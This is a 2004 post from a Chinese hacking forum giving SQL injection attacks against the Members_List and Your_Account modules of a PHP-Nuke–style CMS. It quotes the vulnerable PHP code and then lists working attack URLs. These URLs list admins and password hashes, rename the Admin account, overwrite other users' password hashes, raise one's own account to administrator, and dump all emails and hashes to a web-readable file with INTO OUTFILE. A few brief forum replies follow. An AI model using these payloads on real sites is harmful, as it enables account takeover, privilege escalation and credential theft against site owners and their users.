论坛: 黑客进阶 标题: SQL注入 复制本贴地址    
作者: abctm [abctm]    版主   登录
涉及程序:
SQL 6.0

描述:
SQL注入缺陷使用方法及代码

详细:
SQL的Members_List、Your_Account模块中存在注入缺陷。如果magic_quotes_gpc选项为“OFF”,攻击者使用下列攻击方法及代码能利用该缺陷:
PHP代码/位置:
?/modules/Members_List/index.php :

------------------------------------------------------------------------
[...]
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from
".$user_prefix."_users ";
$where = "where uname != 'Anonymous' ";

if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
$where .= "AND uname like '".$letter."%' ";

} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
$where .= "AND uname REGEXP \"^\[1-9]\" ";

} else {
$where .= "";
}
$sort = "order by $sortby";
$limit = " ASC LIMIT ".$min.", ".$max;

$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);

$result = sql_query($select.$where.$sort.$limit, $dbi) or die();


echo "<br>";
if ( $letter != "front" ) {
echo "<table width=\"100%\" border=\"0\"
cellspacing=\"1\"><tr>\n";
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font
color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font
color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font
color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";
echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font
color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";
$cols = 4;
[...]
------------------------------------------------------------------------

/modules/Your_Account/index.php :
switch($op) {
[...]
case "mailpasswd":
mail_password($uname, $code);
break;

case "userinfo":
userinfo($uname, $bypass, $hid, $url);
break;

case "login":
login($uname, $pass);
break;
[...]
case "saveuser":
saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,
$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
break;
[...]
case "savehome":
savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson);
break;

case "savetheme":
savetheme($uid, $theme);
break;
[...]
case "savecomm":
savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
break;
[...]
}
------------------------------------------------------------------------

/modules/Your_Account/index.php :
[...]
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,
$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,
$module_name;
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname='$check'", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) AND ($check2 == $ccpass)) {
if (!eregi("http://";, $url)) {
$url = "http://$url";
}
if ((isset($pass)) && ("$pass" != "$vpass")) {
echo "<center>"._PASSDIFFERENT."</center>";
} elseif (($pass != "") && (strlen($pass) < $minpass)) {
echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b>
"._CHARLONG."</center>";
} else {
if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =
FixQuotes($bio); }
if ($pass != "") {
Cookiedecode($user);
sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
$pass = md5($pass);
sql_query("update ".$user_prefix."_users set name='$realname',
email='$email', femail='$femail', url='$url', pass='$pass', bio='$bio' ,
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ',
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig',
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm',
newsletter='$newsletter' where uid='$uid'", $dbi);
$result = sql_query("select uid, uname, pass, storynum, umode, uorder,
thold, noscore, ublockon, theme from ".$user_prefix."_users where
uname='$uname' and pass='$pass'", $dbi);
if(sql_num_rows($result, $dbi)==1) {
$userinfo = sql_fetch_array($result, $dbi);

doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
} else {
echo "<center>"._SOMETHINGWRONG."</center><br>";
}
sql_query("UNLOCK TABLES", $dbi);
} else {
sql_query("update ".$user_prefix."_users set name='$realname',
email='$email', femail='$femail', url='$url', bio='$bio',
user_avatar='$user_avatar', user_icq='$user_icq', user_occ='$user_occ',
user_from='$user_from', user_intrest='$user_intrest', user_sig='$user_sig',
user_aim='$user_aim', user_yim='$user_yim', user_msnm='$user_msnm',
newsletter='$newsletter' where uid='$uid'", $dbi);
if ($attach) {
$a = 1;
} else {
$a = 0;
}
}
Header("Location: modules.php?name=$module_name");
}
}
}
[...]
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
$popmeson) {
global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname='$check'", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) AND ($check2 == $ccpass)) {
if(isset($ublockon)) $ublockon=1; else $ublockon=0;
$ublock = FixQuotes($ublock);
sql_query("update ".$user_prefix."_users set storynum='$storynum',
ublockon='$ublockon', ublock='$ublock', broadcast='$broadcast',
popmeson='$popmeson' where uid='$uid'", $dbi);
getusrinfo($user);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
Header("Location: modules.php?name=$module_name");
}
}

function savetheme($uid, $theme) {
global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname='$check'", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) AND ($check2 == $ccpass)) {
sql_query("update ".$user_prefix."_users set theme='$theme' where
uid='$uid'", $dbi);
getusrinfo($user);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
Header("Location: modules.php?name=$module_name&theme=$theme");
}
}
[...]
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,
$commentmax) {
global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
Cookiedecode($user);
$check = $Cookie[1];
$check2 = $Cookie[2];
$result = sql_query("select uid, pass from ".$user_prefix."_users where
uname='$check'", $dbi);
list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
if (($uid == $vuid) AND ($check2 == $ccpass)) {
if(isset($noscore)) $noscore=1; else $noscore=0;
sql_query("update ".$user_prefix."_users set umode='$umode',
uorder='$uorder', thold='$thold', noscore='$noscore',
commentmax='$commentmax' where uid='$uid'", $dbi);
getusrinfo($user);
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
Header("Location: modules.php?name=$module_name");
}
}
[...]
------------------------------------------------------------------------

/modules/Your_Account/index.php :
[...]
function mail_password($uname, $code) {
global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,
$module_name;
$result = sql_query("select email, pass from ".$user_prefix."_users
where (uname='$uname')", $dbi);
if(!$result) {
include("header.php");
OpenTable();
echo "<center>"._SORRYNOUSERINFO."</center>";
CloseTable();
include("footer.php");
[...]
------------------------------------------------------------------------


------------------------------------------------------------------------
[...]
function userinfo($uname, $bypass=0, $hid=0, $url=0) {
global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin,
$broadcast_msg, $my_headlines, $module_name;
$result = sql_query("select uid, femail, url, bio, user_avatar,
user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,
user_sig, pass, newsletter from ".$user_prefix."_users where
uname='$uname'", $dbi);
$userinfo = sql_fetch_array($result, $dbi);
[...]
------------------------------------------------------------------------


------------------------------------------------------------------------
[...]
function login($uname, $pass) {
global $setinfo, $user_prefix, $dbi, $module_name;
$result = sql_query("select pass, uid, storynum, umode, uorder, thold,
noscore, ublockon, theme, commentmax from ".$user_prefix."_users where
uname='$uname'", $dbi);
$setinfo = sql_fetch_array($result, $dbi);
[...]
}
[...]
------------------------------------------------------------------------

Members_List模块:
- 显示用户: http://[target]/modules.php?name=Members_List&letter=All&sortby=pass

- 显示用户: http://[target]/modules.php?name=Members_List&letter=All&sortby=uid

- 显示moderators : http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='2'/*

- 显示管理员: http://[target]/modules.php?name=Members_List&letter='%20OR%20user_level='4'/*

- 显示所有以“abc”开头的用户 : http://[target]/modules.php?name=Members_List&letter='%20OR%20pass%20LIKE%20'abc%25'/*

Your_Account模块 :
- 将“Admind”用户更名为“Hophophop” : http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',name='Hophophop'%20where%20uname='Admin'/*&uid=[OUR_UID]

- 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”: http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=saveuser&realname=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=saveuser&email=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=savehome&storynum=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=savecomm&umode=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=savecomm&thold=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*&uid=[OUR_UID]

- 将普通用户提升至管理员权限: http://[target]/modules.php?name=Your_Account&op=savetheme&theme=',user_level='4&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=saveuser&femail=',user_level='4&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://',user_level='4&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=',user_level='4&uid=[OUR_UID]
或: http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=',user_level='4&uid=[OUR_UID]

- 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 : http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=')%20OR%201=1%20INTO%20OUTFILE%20'/[path/to/site]/AllMailPass.txt'/*
利用Cookie发送crypted密码能访问用户帐户。

- 将用户的所有信息保存在http://[target]/admintxt中: http://[target]/modules.php?name=Your_Account&op=login&uname='%20OR%user_level>1%20INTO%20OUTFILE%20'/[path/to/site]/admin.txt

[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。



地主 发表时间: 04-02-10 22:38

回复: Idof [idof]   论坛用户   登录
眼花缭乱

B1层 发表时间: 04-02-11 21:21

回复: hacker521 [hacker521]   论坛用户   登录
SQL注入漏洞入侵是比较常见的入侵的方法,第二期的黑客X档案就专门做了介绍.呵呵,看代码是一件很麻烦的事,不过如果你明白这些代码在入侵中的作用后你就会重视他了(好象在讲大道理)

B2层 发表时间: 04-02-11 21:38

回复: lhh2003 [lhh2003]   论坛用户   登录
顶,不过最好简单点,代码头晕!

B3层 发表时间: 04-02-12 15:49

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号